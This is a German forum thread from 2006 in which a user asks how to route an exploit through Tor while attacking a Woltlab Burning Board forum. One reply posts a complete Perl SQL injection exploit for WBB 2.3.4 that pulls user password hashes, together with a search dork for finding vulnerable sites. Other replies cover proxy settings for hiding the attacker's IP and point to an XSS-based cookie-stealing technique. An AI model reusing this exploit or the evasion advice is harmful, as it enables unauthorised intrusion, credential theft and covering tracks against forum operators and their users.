Wann ein Proxy bei einem Exploit?

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von 00johnny00, 22. Mai 2006 .

Schlagworte:
  1. 22. Mai 2006
    hi,


    sollte ich schon einen Proxy benutzen, wenn ich den Exploit mit Active Perl ausführe oder erst wenn ich den Hash entschlüsselt habe und mich einloggen will???


    mfg johnny
     
  2. 22. Mai 2006
    huhu,

    naja rein vom logischen erstellt er ja beim exploiten ne verbindung zum server...

    also wird deine ip übermittelt.

    mfg halloween
     
  3. 22. Mai 2006
    Hast du denn eine Ahnung, ob ich TOR auch als Proxy nehmen kann???
     
  4. 22. Mai 2006
    rhetorische frage



    mfg moep
     
  5. 22. Mai 2006
    spricht nix dagegen warum du das nicht benutzen könntest


    See ya
     
  6. 22. Mai 2006
    Und wo müsste ich dann 127.0.0.1 9050 angeben?

    Müsste das dann so aussehen?

    mfg johnny
     
  7. 22. Mai 2006
    1. ich würde es mit dem exploit lassen... das ding stellt 100e Verbindungen zum Server her... sehr leicht zu loggen, teilweise werden die singer rausgefiltert... und dann dem Admin gemeldet!

    2. my $proxy = '127.0.0.1'; # proxy, you can leave this empty
    da würde ich mal vermuten, dass der port fehlt... 127.0.0.1:80 als beispiel

    3. wenn du unbedingt ein board hacken muss, dann machs doch mit der xss avatar technik... (google.de)

    4. wenns n protal auf 2.3.4 ist (jgs-portal)--->

    Code:
    #!/usr/bin/perl
    
    use IO::Socket;
    
    print q{
    ################################################################################
    ## ##
    
    ## Woltlab Burning Board 2.3.4 <= "links.php" <= SQL Injection Exploit ##
    ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
    ## Exploit by | LoK-Crew ##
    
    ## Vulnerability by | x82 ##
    ## Googledork | inurl:/wbb2/links.php?cat ##
    ## Usage | links.pl [server] [path] ##
    
    ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
    ## ##
    ################################################################################
    
    
    };
    
    $webpage = $ARGV[0];
    $directory = $ARGV[1];
    
    if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }
    
    $wbb_dir = "http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
    
    
    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";
    print "[+] Exploiting....\n";
    
    print $sock "GET $wbb_dir HTTP/1.1\n";
    print $sock "Accept: */*\n";
    print $sock "User-Agent: Hacker\n";
    print $sock "Host: $webpage\n";
    print $sock "Connection: close\n\n";
    
    
    while ($answer = <$sock>) {
    if ($answer =~ /(................................)<\/b><\/font>/) {
    print "[+] Hash: $1\n";
    exit();
    }
    if ($answer =~ /SQL-DATABASE ERROR/) {
    
    break;
    }
    }
    
    $wbb_dir = "http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
    close($sock);
    
    $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", PeerPort=>"80") || die "[+] Can't connect to Server\n";
    
    print $sock "GET $wbb_dir HTTP/1.1\n";
    print $sock "Accept: */*\n";
    print $sock "User-Agent: Hacker\n";
    print $sock "Host: $webpage\n";
    print $sock "Connection: close\n\n";
    
    
    while ($answer = <$sock>) {
    if ($answer =~ /(................................)<\/b><\/font>/) {
    print "[+] Hash: $1\n";
    exit();
    }
    if ($answer =~ /SQL-DATABASE ERROR/) {
    
    print "[+] Try replacing bb1_users with bb2_users\n";
    break;
    }
    }
    close($sock);
    
    print "[+] Exploit failed\n"; 
     
  8. 22. Mai 2006
    Was noch nicht ist kann ja noch werden!


    So, ich will ja kein WBB 2.3.4 hacken, sondern nur 2.3.1 und die sind eh fast alle nicht mehr in Betrieb!
    Denke, mal das die Avatar Cookie Klau Technik noch ein bissl gefährlicher ist!

    Und das SQl-blublublub Exploit ist auch der einzige den ich für WBB 2.3.1 gefunden habe der mit zu stimmt.

    Jetzt hätte ich gerne mal vernünftige Antowrten und nicht mehr so viel "Spam" !


    mfg johnny
     
  9. 22. Mai 2006
    Hust kennst du den Port 8118


    und HF beim wbb "hacken"
     
  10. 23. Mai 2006
    LoL? Mir wurde gesagt, dass wenn ich den Port 9050 in die .txt schreibe, dass ich einen Socks5 und bei 8118 nen Socks4!
     
  11. 23. Mai 2006
    1. du kannst über über einen Socksproxy nicht direkt HTML übertragen... (Stichwort: http proxy)
    2. my $proxy = 'www.meinproxy.de:8080';
    3. my ($addr, $port) = ($proxy ne '') ? split(/:/, $proxy) : ($host, 80);

    // wie wäre es mit einer Sektion: "wie verwende ich Exploits - und HACKE damit wbb" ^^ [Deckung IRONIE]
     
  12. 23. Mai 2006
    // für TOR:

    Also Port 9050 => Socks
    Port 8118 => HTTP

    Socks Port kann man editieren bzw. verändern also auf einen anderen Port legen
    HTTP nicht ist fest auf Port 8118


    klingt komisch ? is aber so !
     
  13. 23. Mai 2006
    nur mit Tor und Privoxy und der standart Einstellung.
    Socks und HTTP Proxy können an allen Ports horchen. Für HTTP-Proxys wird oft auch 80 oder 8080 genommen.
     
  14. 23. Mai 2006
    Solange du das nicht im guten EU lande machst ist es nicht Zwingend erforderlich einen proxy zu benutzen.Da du aber bestimmt im besitz eines stro`z bist würde es sich doch anbieten über die command von dort aus etwas in richtung exploiten zu machen ? Oder am besten noch die finger weg lassen und die armen board admins nicht zur verzweiflung bringen.
     
  15. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.